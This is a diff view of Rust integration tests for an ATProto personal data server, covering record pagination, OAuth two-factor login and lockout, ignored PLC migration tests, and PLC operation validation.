("limit", "2"),
512
+
("reverse", "true"),
513
+
])
514
+
.send()
515
+
.await
516
+
.expect("Failed to list records");
517
+
518
+
assert_eq!(res.status(), StatusCode::OK);
519
+
let body: Value = res.json().await.unwrap();
520
+
let records = body["records"].as_array().unwrap();
521
+
let first_rkeys: Vec<&str> = records
522
+
.iter()
523
+
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
524
+
.collect();
525
+
526
+
assert_eq!(first_rkeys, vec!["post00", "post01"], "First page with reverse should start from oldest");
527
+
528
+
if let Some(cursor) = body["cursor"].as_str() {
529
+
let res2 = client
530
+
.get(format!(
531
+
"{}/xrpc/com.atproto.repo.listRecords",
532
+
base_url().await
533
+
))
534
+
.query(&[
535
+
("repo", did.as_str()),
536
+
("collection", "app.bsky.feed.post"),
537
+
("limit", "2"),
538
+
("reverse", "true"),
539
+
("cursor", cursor),
540
+
])
541
+
.send()
542
+
.await
543
+
.expect("Failed to list records with cursor");
544
+
545
+
let body2: Value = res2.json().await.unwrap();
546
+
let records2 = body2["records"].as_array().unwrap();
547
+
let second_rkeys: Vec<&str> = records2
548
+
.iter()
549
+
.map(|r| r["uri"].as_str().unwrap().split('/').last().unwrap())
550
+
.collect();
551
+
552
+
assert_eq!(second_rkeys, vec!["post02", "post03"], "Second page should continue in ASC order");
553
+
}
554
+
}
+633
tests/oauth.rs
+633
tests/oauth.rs
···
323
324
let auth_res = client
325
.get(format!("{}/oauth/authorize", url))
326
.query(&[("request_uri", request_uri)])
327
.send()
328
.await
···
344
345
let res = client
346
.get(format!("{}/oauth/authorize", url))
347
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:nonexistent")])
348
.send()
349
.await
···
941
942
let auth_res = http_client
943
.post(format!("{}/oauth/authorize", url))
944
.form(&[
945
("request_uri", request_uri),
946
("username", &handle),
···
1162
1163
let auth_res = http_client
1164
.post(format!("{}/oauth/authorize", url))
1165
.form(&[
1166
("request_uri", request_uri),
1167
("username", &handle),
···
1184
1185
let res = http_client
1186
.get(format!("{}/oauth/authorize", url))
1187
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:expired-or-nonexistent")])
1188
.send()
1189
.await
···
1477
location
1478
);
1479
}
···
323
324
let auth_res = client
325
.get(format!("{}/oauth/authorize", url))
326
+
.header("Accept", "application/json")
327
.query(&[("request_uri", request_uri)])
328
.send()
329
.await
···
345
346
let res = client
347
.get(format!("{}/oauth/authorize", url))
348
+
.header("Accept", "application/json")
349
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:nonexistent")])
350
.send()
351
.await
···
943
944
let auth_res = http_client
945
.post(format!("{}/oauth/authorize", url))
946
+
.header("Accept", "application/json")
947
.form(&[
948
("request_uri", request_uri),
949
("username", &handle),
···
1165
1166
let auth_res = http_client
1167
.post(format!("{}/oauth/authorize", url))
1168
+
.header("Accept", "application/json")
1169
.form(&[
1170
("request_uri", request_uri),
1171
("username", &handle),
···
1188
1189
let res = http_client
1190
.get(format!("{}/oauth/authorize", url))
1191
+
.header("Accept", "application/json")
1192
.query(&[("request_uri", "urn:ietf:params:oauth:request_uri:expired-or-nonexistent")])
1193
.send()
1194
.await
···
1482
location
1483
);
1484
}
1485
+
1486
+
#[tokio::test]
1487
+
async fn test_2fa_required_when_enabled() {
1488
+
let url = base_url().await;
1489
+
let http_client = client();
1490
+
1491
+
let ts = Utc::now().timestamp_millis();
1492
+
let handle = format!("2fa-required-{}", ts);
1493
+
let email = format!("2fa-required-{}@example.com", ts);
1494
+
let password = "2fa-test-password";
1495
+
1496
+
let create_res = http_client
1497
+
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
1498
+
.json(&json!({
1499
+
"handle": handle,
1500
+
"email": email,
1501
+
"password": password
1502
+
}))
1503
+
.send()
1504
+
.await
1505
+
.unwrap();
1506
+
assert_eq!(create_res.status(), StatusCode::OK);
1507
+
let account: Value = create_res.json().await.unwrap();
1508
+
let user_did = account["did"].as_str().unwrap();
1509
+
1510
+
let db_url = common::get_db_connection_string().await;
1511
+
let pool = sqlx::postgres::PgPoolOptions::new()
1512
+
.max_connections(1)
1513
+
.connect(&db_url)
1514
+
.await
1515
+
.expect("Failed to connect to database");
1516
+
1517
+
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
1518
+
.bind(user_did)
1519
+
.execute(&pool)
1520
+
.await
1521
+
.expect("Failed to enable 2FA");
1522
+
1523
+
let redirect_uri = "https://example.com/2fa-callback";
1524
+
let mock_client = setup_mock_client_metadata(redirect_uri).await;
1525
+
let client_id = mock_client.uri();
1526
+
1527
+
let (_, code_challenge) = generate_pkce();
1528
+
1529
+
let par_body: Value = http_client
1530
+
.post(format!("{}/oauth/par", url))
1531
+
.form(&[
1532
+
("response_type", "code"),
1533
+
("client_id", &client_id),
1534
+
("redirect_uri", redirect_uri),
1535
+
("code_challenge", &code_challenge),
1536
+
("code_challenge_method", "S256"),
1537
+
])
1538
+
.send()
1539
+
.await
1540
+
.unwrap()
1541
+
.json()
1542
+
.await
1543
+
.unwrap();
1544
+
1545
+
let request_uri = par_body["request_uri"].as_str().unwrap();
1546
+
1547
+
let auth_client = no_redirect_client();
1548
+
let auth_res = auth_client
1549
+
.post(format!("{}/oauth/authorize", url))
1550
+
.form(&[
1551
+
("request_uri", request_uri),
1552
+
("username", &handle),
1553
+
("password", password),
1554
+
("remember_device", "false"),
1555
+
])
1556
+
.send()
1557
+
.await
1558
+
.unwrap();
1559
+
1560
+
assert!(
1561
+
auth_res.status().is_redirection(),
1562
+
"Should redirect to 2FA page, got status: {}",
1563
+
auth_res.status()
1564
+
);
1565
+
1566
+
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
1567
+
assert!(
1568
+
location.contains("/oauth/authorize/2fa"),
1569
+
"Should redirect to 2FA page, got: {}",
1570
+
location
1571
+
);
1572
+
assert!(
1573
+
location.contains("request_uri="),
1574
+
"2FA redirect should include request_uri"
1575
+
);
1576
+
}
1577
+
1578
+
#[tokio::test]
1579
+
async fn test_2fa_invalid_code_rejected() {
1580
+
let url = base_url().await;
1581
+
let http_client = client();
1582
+
1583
+
let ts = Utc::now().timestamp_millis();
1584
+
let handle = format!("2fa-invalid-{}", ts);
1585
+
let email = format!("2fa-invalid-{}@example.com", ts);
1586
+
let password = "2fa-test-password";
1587
+
1588
+
let create_res = http_client
1589
+
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
1590
+
.json(&json!({
1591
+
"handle": handle,
1592
+
"email": email,
1593
+
"password": password
1594
+
}))
1595
+
.send()
1596
+
.await
1597
+
.unwrap();
1598
+
assert_eq!(create_res.status(), StatusCode::OK);
1599
+
let account: Value = create_res.json().await.unwrap();
1600
+
let user_did = account["did"].as_str().unwrap();
1601
+
1602
+
let db_url = common::get_db_connection_string().await;
1603
+
let pool = sqlx::postgres::PgPoolOptions::new()
1604
+
.max_connections(1)
1605
+
.connect(&db_url)
1606
+
.await
1607
+
.expect("Failed to connect to database");
1608
+
1609
+
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
1610
+
.bind(user_did)
1611
+
.execute(&pool)
1612
+
.await
1613
+
.expect("Failed to enable 2FA");
1614
+
1615
+
let redirect_uri = "https://example.com/2fa-invalid-callback";
1616
+
let mock_client = setup_mock_client_metadata(redirect_uri).await;
1617
+
let client_id = mock_client.uri();
1618
+
1619
+
let (_, code_challenge) = generate_pkce();
1620
+
1621
+
let par_body: Value = http_client
1622
+
.post(format!("{}/oauth/par", url))
1623
+
.form(&[
1624
+
("response_type", "code"),
1625
+
("client_id", &client_id),
1626
+
("redirect_uri", redirect_uri),
1627
+
("code_challenge", &code_challenge),
1628
+
("code_challenge_method", "S256"),
1629
+
])
1630
+
.send()
1631
+
.await
1632
+
.unwrap()
1633
+
.json()
1634
+
.await
1635
+
.unwrap();
1636
+
1637
+
let request_uri = par_body["request_uri"].as_str().unwrap();
1638
+
1639
+
let auth_client = no_redirect_client();
1640
+
let auth_res = auth_client
1641
+
.post(format!("{}/oauth/authorize", url))
1642
+
.form(&[
1643
+
("request_uri", request_uri),
1644
+
("username", &handle),
1645
+
("password", password),
1646
+
("remember_device", "false"),
1647
+
])
1648
+
.send()
1649
+
.await
1650
+
.unwrap();
1651
+
1652
+
assert!(auth_res.status().is_redirection());
1653
+
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
1654
+
assert!(location.contains("/oauth/authorize/2fa"));
1655
+
1656
+
let twofa_res = http_client
1657
+
.post(format!("{}/oauth/authorize/2fa", url))
1658
+
.form(&[
1659
+
("request_uri", request_uri),
1660
+
("code", "000000"),
1661
+
])
1662
+
.send()
1663
+
.await
1664
+
.unwrap();
1665
+
1666
+
assert_eq!(twofa_res.status(), StatusCode::OK);
1667
+
let body = twofa_res.text().await.unwrap();
1668
+
assert!(
1669
+
body.contains("Invalid verification code") || body.contains("invalid"),
1670
+
"Should show error for invalid code"
1671
+
);
1672
+
}
1673
+
1674
+
#[tokio::test]
1675
+
async fn test_2fa_valid_code_completes_auth() {
1676
+
let url = base_url().await;
1677
+
let http_client = client();
1678
+
1679
+
let ts = Utc::now().timestamp_millis();
1680
+
let handle = format!("2fa-valid-{}", ts);
1681
+
let email = format!("2fa-valid-{}@example.com", ts);
1682
+
let password = "2fa-test-password";
1683
+
1684
+
let create_res = http_client
1685
+
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
1686
+
.json(&json!({
1687
+
"handle": handle,
1688
+
"email": email,
1689
+
"password": password
1690
+
}))
1691
+
.send()
1692
+
.await
1693
+
.unwrap();
1694
+
assert_eq!(create_res.status(), StatusCode::OK);
1695
+
let account: Value = create_res.json().await.unwrap();
1696
+
let user_did = account["did"].as_str().unwrap();
1697
+
1698
+
let db_url = common::get_db_connection_string().await;
1699
+
let pool = sqlx::postgres::PgPoolOptions::new()
1700
+
.max_connections(1)
1701
+
.connect(&db_url)
1702
+
.await
1703
+
.expect("Failed to connect to database");
1704
+
1705
+
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
1706
+
.bind(user_did)
1707
+
.execute(&pool)
1708
+
.await
1709
+
.expect("Failed to enable 2FA");
1710
+
1711
+
let redirect_uri = "https://example.com/2fa-valid-callback";
1712
+
let mock_client = setup_mock_client_metadata(redirect_uri).await;
1713
+
let client_id = mock_client.uri();
1714
+
1715
+
let (code_verifier, code_challenge) = generate_pkce();
1716
+
1717
+
let par_body: Value = http_client
1718
+
.post(format!("{}/oauth/par", url))
1719
+
.form(&[
1720
+
("response_type", "code"),
1721
+
("client_id", &client_id),
1722
+
("redirect_uri", redirect_uri),
1723
+
("code_challenge", &code_challenge),
1724
+
("code_challenge_method", "S256"),
1725
+
])
1726
+
.send()
1727
+
.await
1728
+
.unwrap()
1729
+
.json()
1730
+
.await
1731
+
.unwrap();
1732
+
1733
+
let request_uri = par_body["request_uri"].as_str().unwrap();
1734
+
1735
+
let auth_client = no_redirect_client();
1736
+
let auth_res = auth_client
1737
+
.post(format!("{}/oauth/authorize", url))
1738
+
.form(&[
1739
+
("request_uri", request_uri),
1740
+
("username", &handle),
1741
+
("password", password),
1742
+
("remember_device", "false"),
1743
+
])
1744
+
.send()
1745
+
.await
1746
+
.unwrap();
1747
+
1748
+
assert!(auth_res.status().is_redirection());
1749
+
1750
+
let twofa_code: String = sqlx::query_scalar(
1751
+
"SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1"
1752
+
)
1753
+
.bind(request_uri)
1754
+
.fetch_one(&pool)
1755
+
.await
1756
+
.expect("Failed to get 2FA code from database");
1757
+
1758
+
let twofa_res = auth_client
1759
+
.post(format!("{}/oauth/authorize/2fa", url))
1760
+
.form(&[
1761
+
("request_uri", request_uri),
1762
+
("code", &twofa_code),
1763
+
])
1764
+
.send()
1765
+
.await
1766
+
.unwrap();
1767
+
1768
+
assert!(
1769
+
twofa_res.status().is_redirection(),
1770
+
"Valid 2FA code should redirect to success, got status: {}",
1771
+
twofa_res.status()
1772
+
);
1773
+
1774
+
let location = twofa_res.headers().get("location").unwrap().to_str().unwrap();
1775
+
assert!(
1776
+
location.starts_with(redirect_uri),
1777
+
"Should redirect to client callback, got: {}",
1778
+
location
1779
+
);
1780
+
assert!(
1781
+
location.contains("code="),
1782
+
"Redirect should include authorization code"
1783
+
);
1784
+
1785
+
let auth_code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
1786
+
1787
+
let token_res = http_client
1788
+
.post(format!("{}/oauth/token", url))
1789
+
.form(&[
1790
+
("grant_type", "authorization_code"),
1791
+
("code", auth_code),
1792
+
("redirect_uri", redirect_uri),
1793
+
("code_verifier", &code_verifier),
1794
+
("client_id", &client_id),
1795
+
])
1796
+
.send()
1797
+
.await
1798
+
.unwrap();
1799
+
1800
+
assert_eq!(token_res.status(), StatusCode::OK, "Token exchange should succeed");
1801
+
let token_body: Value = token_res.json().await.unwrap();
1802
+
assert!(token_body["access_token"].is_string());
1803
+
assert_eq!(token_body["sub"], user_did);
1804
+
}
1805
+
1806
+
#[tokio::test]
1807
+
async fn test_2fa_lockout_after_max_attempts() {
1808
+
let url = base_url().await;
1809
+
let http_client = client();
1810
+
1811
+
let ts = Utc::now().timestamp_millis();
1812
+
let handle = format!("2fa-lockout-{}", ts);
1813
+
let email = format!("2fa-lockout-{}@example.com", ts);
1814
+
let password = "2fa-test-password";
1815
+
1816
+
let create_res = http_client
1817
+
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
1818
+
.json(&json!({
1819
+
"handle": handle,
1820
+
"email": email,
1821
+
"password": password
1822
+
}))
1823
+
.send()
1824
+
.await
1825
+
.unwrap();
1826
+
assert_eq!(create_res.status(), StatusCode::OK);
1827
+
let account: Value = create_res.json().await.unwrap();
1828
+
let user_did = account["did"].as_str().unwrap();
1829
+
1830
+
let db_url = common::get_db_connection_string().await;
1831
+
let pool = sqlx::postgres::PgPoolOptions::new()
1832
+
.max_connections(1)
1833
+
.connect(&db_url)
1834
+
.await
1835
+
.expect("Failed to connect to database");
1836
+
1837
+
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
1838
+
.bind(user_did)
1839
+
.execute(&pool)
1840
+
.await
1841
+
.expect("Failed to enable 2FA");
1842
+
1843
+
let redirect_uri = "https://example.com/2fa-lockout-callback";
1844
+
let mock_client = setup_mock_client_metadata(redirect_uri).await;
1845
+
let client_id = mock_client.uri();
1846
+
1847
+
let (_, code_challenge) = generate_pkce();
1848
+
1849
+
let par_body: Value = http_client
1850
+
.post(format!("{}/oauth/par", url))
1851
+
.form(&[
1852
+
("response_type", "code"),
1853
+
("client_id", &client_id),
1854
+
("redirect_uri", redirect_uri),
1855
+
("code_challenge", &code_challenge),
1856
+
("code_challenge_method", "S256"),
1857
+
])
1858
+
.send()
1859
+
.await
1860
+
.unwrap()
1861
+
.json()
1862
+
.await
1863
+
.unwrap();
1864
+
1865
+
let request_uri = par_body["request_uri"].as_str().unwrap();
1866
+
1867
+
let auth_client = no_redirect_client();
1868
+
let auth_res = auth_client
1869
+
.post(format!("{}/oauth/authorize", url))
1870
+
.form(&[
1871
+
("request_uri", request_uri),
1872
+
("username", &handle),
1873
+
("password", password),
1874
+
("remember_device", "false"),
1875
+
])
1876
+
.send()
1877
+
.await
1878
+
.unwrap();
1879
+
1880
+
assert!(auth_res.status().is_redirection());
1881
+
1882
+
for i in 0..5 {
1883
+
let res = http_client
1884
+
.post(format!("{}/oauth/authorize/2fa", url))
1885
+
.form(&[
1886
+
("request_uri", request_uri),
1887
+
("code", "999999"),
1888
+
])
1889
+
.send()
1890
+
.await
1891
+
.unwrap();
1892
+
1893
+
if i < 4 {
1894
+
assert_eq!(res.status(), StatusCode::OK, "Attempt {} should show error page", i + 1);
1895
+
let body = res.text().await.unwrap();
1896
+
assert!(
1897
+
body.contains("Invalid verification code"),
1898
+
"Should show invalid code error on attempt {}", i + 1
1899
+
);
1900
+
}
1901
+
}
1902
+
1903
+
let lockout_res = http_client
1904
+
.post(format!("{}/oauth/authorize/2fa", url))
1905
+
.form(&[
1906
+
("request_uri", request_uri),
1907
+
("code", "999999"),
1908
+
])
1909
+
.send()
1910
+
.await
1911
+
.unwrap();
1912
+
1913
+
assert_eq!(lockout_res.status(), StatusCode::OK);
1914
+
let body = lockout_res.text().await.unwrap();
1915
+
assert!(
1916
+
body.contains("Too many failed attempts") || body.contains("No 2FA challenge found"),
1917
+
"Should be locked out after max attempts. Body: {}",
1918
+
&body[..body.len().min(500)]
1919
+
);
1920
+
}
1921
+
1922
+
#[tokio::test]
1923
+
async fn test_account_selector_with_2fa_requires_verification() {
1924
+
let url = base_url().await;
1925
+
let http_client = client();
1926
+
1927
+
let ts = Utc::now().timestamp_millis();
1928
+
let handle = format!("selector-2fa-{}", ts);
1929
+
let email = format!("selector-2fa-{}@example.com", ts);
1930
+
let password = "selector-2fa-password";
1931
+
1932
+
let create_res = http_client
1933
+
.post(format!("{}/xrpc/com.atproto.server.createAccount", url))
1934
+
.json(&json!({
1935
+
"handle": handle,
1936
+
"email": email,
1937
+
"password": password
1938
+
}))
1939
+
.send()
1940
+
.await
1941
+
.unwrap();
1942
+
assert_eq!(create_res.status(), StatusCode::OK);
1943
+
let account: Value = create_res.json().await.unwrap();
1944
+
let user_did = account["did"].as_str().unwrap().to_string();
1945
+
1946
+
let redirect_uri = "https://example.com/selector-2fa-callback";
1947
+
let mock_client = setup_mock_client_metadata(redirect_uri).await;
1948
+
let client_id = mock_client.uri();
1949
+
1950
+
let (code_verifier, code_challenge) = generate_pkce();
1951
+
1952
+
let par_body: Value = http_client
1953
+
.post(format!("{}/oauth/par", url))
1954
+
.form(&[
1955
+
("response_type", "code"),
1956
+
("client_id", &client_id),
1957
+
("redirect_uri", redirect_uri),
1958
+
("code_challenge", &code_challenge),
1959
+
("code_challenge_method", "S256"),
1960
+
])
1961
+
.send()
1962
+
.await
1963
+
.unwrap()
1964
+
.json()
1965
+
.await
1966
+
.unwrap();
1967
+
1968
+
let request_uri = par_body["request_uri"].as_str().unwrap();
1969
+
1970
+
let auth_client = no_redirect_client();
1971
+
let auth_res = auth_client
1972
+
.post(format!("{}/oauth/authorize", url))
1973
+
.form(&[
1974
+
("request_uri", request_uri),
1975
+
("username", &handle),
1976
+
("password", password),
1977
+
("remember_device", "true"),
1978
+
])
1979
+
.send()
1980
+
.await
1981
+
.unwrap();
1982
+
1983
+
assert!(auth_res.status().is_redirection());
1984
+
1985
+
let device_cookie = auth_res.headers()
1986
+
.get("set-cookie")
1987
+
.and_then(|v| v.to_str().ok())
1988
+
.map(|s| s.split(';').next().unwrap_or("").to_string())
1989
+
.expect("Should have received device cookie");
1990
+
1991
+
let location = auth_res.headers().get("location").unwrap().to_str().unwrap();
1992
+
assert!(location.contains("code="), "First auth should succeed");
1993
+
1994
+
let code = location.split("code=").nth(1).unwrap().split('&').next().unwrap();
1995
+
let _token_body: Value = http_client
1996
+
.post(format!("{}/oauth/token", url))
1997
+
.form(&[
1998
+
("grant_type", "authorization_code"),
1999
+
("code", code),
2000
+
("redirect_uri", redirect_uri),
2001
+
("code_verifier", &code_verifier),
2002
+
("client_id", &client_id),
2003
+
])
2004
+
.send()
2005
+
.await
2006
+
.unwrap()
2007
+
.json()
2008
+
.await
2009
+
.unwrap();
2010
+
2011
+
let db_url = common::get_db_connection_string().await;
2012
+
let pool = sqlx::postgres::PgPoolOptions::new()
2013
+
.max_connections(1)
2014
+
.connect(&db_url)
2015
+
.await
2016
+
.expect("Failed to connect to database");
2017
+
2018
+
sqlx::query("UPDATE users SET two_factor_enabled = true WHERE did = $1")
2019
+
.bind(&user_did)
2020
+
.execute(&pool)
2021
+
.await
2022
+
.expect("Failed to enable 2FA");
2023
+
2024
+
let (code_verifier2, code_challenge2) = generate_pkce();
2025
+
2026
+
let par_body2: Value = http_client
2027
+
.post(format!("{}/oauth/par", url))
2028
+
.form(&[
2029
+
("response_type", "code"),
2030
+
("client_id", &client_id),
2031
+
("redirect_uri", redirect_uri),
2032
+
("code_challenge", &code_challenge2),
2033
+
("code_challenge_method", "S256"),
2034
+
])
2035
+
.send()
2036
+
.await
2037
+
.unwrap()
2038
+
.json()
2039
+
.await
2040
+
.unwrap();
2041
+
2042
+
let request_uri2 = par_body2["request_uri"].as_str().unwrap();
2043
+
2044
+
let select_res = auth_client
2045
+
.post(format!("{}/oauth/authorize/select", url))
2046
+
.header("cookie", &device_cookie)
2047
+
.form(&[
2048
+
("request_uri", request_uri2),
2049
+
("did", &user_did),
2050
+
])
2051
+
.send()
2052
+
.await
2053
+
.unwrap();
2054
+
2055
+
assert!(
2056
+
select_res.status().is_redirection(),
2057
+
"Account selector should redirect, got status: {}",
2058
+
select_res.status()
2059
+
);
2060
+
2061
+
let select_location = select_res.headers().get("location").unwrap().to_str().unwrap();
2062
+
assert!(
2063
+
select_location.contains("/oauth/authorize/2fa"),
2064
+
"Account selector with 2FA enabled should redirect to 2FA page, got: {}",
2065
+
select_location
2066
+
);
2067
+
2068
+
let twofa_code: String = sqlx::query_scalar(
2069
+
"SELECT code FROM oauth_2fa_challenge WHERE request_uri = $1"
2070
+
)
2071
+
.bind(request_uri2)
2072
+
.fetch_one(&pool)
2073
+
.await
2074
+
.expect("Failed to get 2FA code");
2075
+
2076
+
let twofa_res = auth_client
2077
+
.post(format!("{}/oauth/authorize/2fa", url))
2078
+
.header("cookie", &device_cookie)
2079
+
.form(&[
2080
+
("request_uri", request_uri2),
2081
+
("code", &twofa_code),
2082
+
])
2083
+
.send()
2084
+
.await
2085
+
.unwrap();
2086
+
2087
+
assert!(twofa_res.status().is_redirection());
2088
+
let final_location = twofa_res.headers().get("location").unwrap().to_str().unwrap();
2089
+
assert!(
2090
+
final_location.starts_with(redirect_uri) && final_location.contains("code="),
2091
+
"After 2FA, should redirect to client with code, got: {}",
2092
+
final_location
2093
+
);
2094
+
2095
+
let final_code = final_location.split("code=").nth(1).unwrap().split('&').next().unwrap();
2096
+
let token_res = http_client
2097
+
.post(format!("{}/oauth/token", url))
2098
+
.form(&[
2099
+
("grant_type", "authorization_code"),
2100
+
("code", final_code),
2101
+
("redirect_uri", redirect_uri),
2102
+
("code_verifier", &code_verifier2),
2103
+
("client_id", &client_id),
2104
+
])
2105
+
.send()
2106
+
.await
2107
+
.unwrap();
2108
+
2109
+
assert_eq!(token_res.status(), StatusCode::OK);
2110
+
let final_token: Value = token_res.json().await.unwrap();
2111
+
assert_eq!(final_token["sub"], user_did, "Token should be for the correct user");
2112
+
}
+1
tests/oauth_security.rs
+1
tests/oauth_security.rs
+2
tests/plc_migration.rs
+2
tests/plc_migration.rs
···
255
}
256
257
#[tokio::test]
258
async fn test_sign_plc_operation_consumes_token() {
259
let client = client();
260
let (token, did) = create_account_and_login(&client).await;
···
902
}
903
904
#[tokio::test]
905
async fn test_full_migration_flow_end_to_end() {
906
let client = client();
907
let (token, did) = create_account_and_login(&client).await;
···
255
}
256
257
#[tokio::test]
258
+
#[ignore = "requires exclusive env var access; run with: cargo test test_sign_plc_operation_consumes_token -- --ignored --test-threads=1"]
259
async fn test_sign_plc_operation_consumes_token() {
260
let client = client();
261
let (token, did) = create_account_and_login(&client).await;
···
903
}
904
905
#[tokio::test]
906
+
#[ignore = "requires exclusive env var access; run with: cargo test test_full_migration_flow_end_to_end -- --ignored --test-threads=1"]
907
async fn test_full_migration_flow_end_to_end() {
908
let client = client();
909
let (token, did) = create_account_and_login(&client).await;
+513
tests/plc_validation.rs
+513
tests/plc_validation.rs
···
···
1
+
use bspds::plc::{
2
+
PlcError, PlcOperation, PlcService, PlcValidationContext,
3
+
cid_for_cbor, sign_operation, signing_key_to_did_key,
4
+
validate_plc_operation, validate_plc_operation_for_submission,
5
+
verify_operation_signature,
6
+
};
7
+
use k256::ecdsa::SigningKey;
8
+
use serde_json::json;
9
+
use std::collections::HashMap;
10
+
11
+
fn create_valid_operation() -> serde_json::Value {
12
+
let key = SigningKey::random(&mut rand::thread_rng());
13
+
let did_key = signing_key_to_did_key(&key);
14
+
15
+
let op = json!({
16
+
"type": "plc_operation",
17
+
"rotationKeys": [did_key.clone()],
18
+
"verificationMethods": {
19
+
"atproto": did_key.clone()
20
+
},
21
+
"alsoKnownAs": ["at://test.handle"],
22
+
"services": {
23
+
"atproto_pds": {
24
+
"type": "AtprotoPersonalDataServer",
25
+
"endpoint": "https://pds.example.com"
26
+
}
27
+
},
28
+
"prev": null
29
+
});
30
+
31
+
sign_operation(&op, &key).unwrap()
32
+
}
33
+
34
+
#[test]
35
+
fn test_validate_plc_operation_valid() {
36
+
let op = create_valid_operation();
37
+
let result = validate_plc_operation(&op);
38
+
assert!(result.is_ok());
39
+
}
40
+
41
+
#[test]
42
+
fn test_validate_plc_operation_missing_type() {
43
+
let op = json!({
44
+
"rotationKeys": [],
45
+
"verificationMethods": {},
46
+
"alsoKnownAs": [],
47
+
"services": {},
48
+
"sig": "test"
49
+
});
50
+
let result = validate_plc_operation(&op);
51
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing type")));
52
+
}
53
+
54
+
#[test]
55
+
fn test_validate_plc_operation_invalid_type() {
56
+
let op = json!({
57
+
"type": "invalid_type",
58
+
"sig": "test"
59
+
});
60
+
let result = validate_plc_operation(&op);
61
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Invalid type")));
62
+
}
63
+
64
+
#[test]
65
+
fn test_validate_plc_operation_missing_sig() {
66
+
let op = json!({
67
+
"type": "plc_operation",
68
+
"rotationKeys": [],
69
+
"verificationMethods": {},
70
+
"alsoKnownAs": [],
71
+
"services": {}
72
+
});
73
+
let result = validate_plc_operation(&op);
74
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("Missing sig")));
75
+
}
76
+
77
+
#[test]
78
+
fn test_validate_plc_operation_missing_rotation_keys() {
79
+
let op = json!({
80
+
"type": "plc_operation",
81
+
"verificationMethods": {},
82
+
"alsoKnownAs": [],
83
+
"services": {},
84
+
"sig": "test"
85
+
});
86
+
let result = validate_plc_operation(&op);
87
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotationKeys")));
88
+
}
89
+
90
+
#[test]
91
+
fn test_validate_plc_operation_missing_verification_methods() {
92
+
let op = json!({
93
+
"type": "plc_operation",
94
+
"rotationKeys": [],
95
+
"alsoKnownAs": [],
96
+
"services": {},
97
+
"sig": "test"
98
+
});
99
+
let result = validate_plc_operation(&op);
100
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("verificationMethods")));
101
+
}
102
+
103
+
#[test]
104
+
fn test_validate_plc_operation_missing_also_known_as() {
105
+
let op = json!({
106
+
"type": "plc_operation",
107
+
"rotationKeys": [],
108
+
"verificationMethods": {},
109
+
"services": {},
110
+
"sig": "test"
111
+
});
112
+
let result = validate_plc_operation(&op);
113
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")));
114
+
}
115
+
116
+
#[test]
117
+
fn test_validate_plc_operation_missing_services() {
118
+
let op = json!({
119
+
"type": "plc_operation",
120
+
"rotationKeys": [],
121
+
"verificationMethods": {},
122
+
"alsoKnownAs": [],
123
+
"sig": "test"
124
+
});
125
+
let result = validate_plc_operation(&op);
126
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("services")));
127
+
}
128
+
129
+
#[test]
130
+
fn test_validate_rotation_key_required() {
131
+
let key = SigningKey::random(&mut rand::thread_rng());
132
+
let did_key = signing_key_to_did_key(&key);
133
+
let server_key = "did:key:zServer123";
134
+
135
+
let op = json!({
136
+
"type": "plc_operation",
137
+
"rotationKeys": [did_key.clone()],
138
+
"verificationMethods": {"atproto": did_key.clone()},
139
+
"alsoKnownAs": ["at://test.handle"],
140
+
"services": {
141
+
"atproto_pds": {
142
+
"type": "AtprotoPersonalDataServer",
143
+
"endpoint": "https://pds.example.com"
144
+
}
145
+
},
146
+
"sig": "test"
147
+
});
148
+
149
+
let ctx = PlcValidationContext {
150
+
server_rotation_key: server_key.to_string(),
151
+
expected_signing_key: did_key.clone(),
152
+
expected_handle: "test.handle".to_string(),
153
+
expected_pds_endpoint: "https://pds.example.com".to_string(),
154
+
};
155
+
156
+
let result = validate_plc_operation_for_submission(&op, &ctx);
157
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")));
158
+
}
159
+
160
+
#[test]
161
+
fn test_validate_signing_key_match() {
162
+
let key = SigningKey::random(&mut rand::thread_rng());
163
+
let did_key = signing_key_to_did_key(&key);
164
+
let wrong_key = "did:key:zWrongKey456";
165
+
166
+
let op = json!({
167
+
"type": "plc_operation",
168
+
"rotationKeys": [did_key.clone()],
169
+
"verificationMethods": {"atproto": wrong_key},
170
+
"alsoKnownAs": ["at://test.handle"],
171
+
"services": {
172
+
"atproto_pds": {
173
+
"type": "AtprotoPersonalDataServer",
174
+
"endpoint": "https://pds.example.com"
175
+
}
176
+
},
177
+
"sig": "test"
178
+
});
179
+
180
+
let ctx = PlcValidationContext {
181
+
server_rotation_key: did_key.clone(),
182
+
expected_signing_key: did_key.clone(),
183
+
expected_handle: "test.handle".to_string(),
184
+
expected_pds_endpoint: "https://pds.example.com".to_string(),
185
+
};
186
+
187
+
let result = validate_plc_operation_for_submission(&op, &ctx);
188
+
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")));
189
+
}
190
+
191
+
#[test]
192
+
fn test_validate_handle_match() {
193
+
let key = SigningKey::random(&mut rand::thread_rng());
194
+
let did_key = signing_key_to_did_key(&key);
195
+
196
+
let op = json!({
197
+
"type": "plc_operation",
198
+
"rotationKeys": [did_key.clone()],
199
+
"verificationMethods": {"atproto": did_key.clone()},
